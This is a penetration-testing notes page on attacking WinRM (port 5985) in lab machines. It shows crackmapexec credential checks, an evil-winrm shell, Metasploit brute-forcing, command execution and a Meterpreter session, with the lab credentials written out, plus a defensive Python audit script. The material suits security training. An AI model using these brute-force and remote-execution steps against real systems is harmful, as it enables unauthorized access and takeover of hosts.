# Port 5985 - WINRM

WinRM (Windows Remote Management) is a Windows-based service that enables administrators to remotely manage and execute commands on Windows machines. It's built on the WS-Management protocol, which is a standard web services protocol used for remote software and hardware management.

Let's check whether the credentials we have are valid for WinRM.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"  
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```

The `(Pwn3d!)` marker means the account can log in over WinRM, so let's get a shell with evil-winrm.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice" 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
```

### WINRM Bruteforcing

```
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit
```

Note: We set PASSWORD because in recent versions of the `winrm_login` module the PASSWORD option is required unless Kerberos authentication is used. Metasploit will still iterate over the `USER_FILE` and `PASS_FILE` word lists set above.


#### Checking the authentication methods WinRM supports

Before connecting to the WinRM service we need to know which authentication methods it accepts, because the client has to use one that the server offers. Microsoft documents the available methods here: <https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections>

**Commands:**

```
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit
```


The target supports two authentication types: Basic and Negotiate.
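The module above works by reading the `WWW-Authenticate` challenge that a WinRM listener returns to an unauthenticated request. The following Python script is an added example, not code from this page or from Metasploit; it performs the same check so that you can audit your own listeners and confirm Basic is not offered on the plain-HTTP port 5985. The sample challenge is constructed, and the `SAMPLE_CHALLENGE`, `parse_auth_methods`, `assess` and `probe_wsman` names are this example's own.

```python
"""Audit the authentication schemes a WinRM listener advertises.

An unauthenticated POST to /wsman returns 401 with WWW-Authenticate headers
listing the accepted schemes (this is what winrm_auth_methods reads). Basic on
the HTTP listener (5985) sends credentials merely base64-encoded.
"""
import urllib.error
import urllib.request

# Constructed sample challenge, shaped like a default WinRM reply (hypothetical).
SAMPLE_CHALLENGE = ["Negotiate", 'Basic realm="WSMan"']


def parse_auth_methods(www_authenticate_values):
    """Return lower-cased scheme names from WWW-Authenticate header values.

    Servers may send one header per scheme or several comma-separated
    challenges in one header; the scheme is the first token of each challenge.
    """
    schemes = set()
    for value in www_authenticate_values:
        for challenge in value.split(","):
            parts = challenge.split()
            if parts:
                schemes.add(parts[0].lower())
    return schemes


def assess(schemes, url):
    """Defender's summary: which schemes are offered and whether Basic is
    reachable without TLS (true for the plain http:// listener on 5985)."""
    plain_http = url.lower().startswith("http://")
    return {
        "schemes": sorted(schemes),
        "basic_over_http": "basic" in schemes and plain_http,
        "negotiate_available": "negotiate" in schemes,
    }


def probe_wsman(url, timeout=5):
    """Send an unauthenticated POST (needs network) and parse the 401 challenge."""
    req = urllib.request.Request(url, data=b"", method="POST",
                                 headers={"Content-Type": "application/soap+xml"})
    try:
        urllib.request.urlopen(req, timeout=timeout)
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return parse_auth_methods(err.headers.get_all("WWW-Authenticate") or [])
        raise
    return set()  # no challenge at all: probably not a WinRM listener
```

Run `assess(probe_wsman("http://<host>:5985/wsman"), "http://<host>:5985/wsman")` against a listener you administer; a `basic_over_http` of `True` is the finding to remediate (disable Basic on the HTTP listener or move to the HTTPS listener).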

#### Executing a command on the target with the winrm\_cmd module

**Commands:**

```
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
```


We have successfully executed the command `whoami` on the remote server.

#### winrm\_script\_exec exploit module

Now we use the `winrm_script_exec` exploit module to get a Meterpreter session.

**Commands:**

```
use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
```


We now have a Meterpreter session.

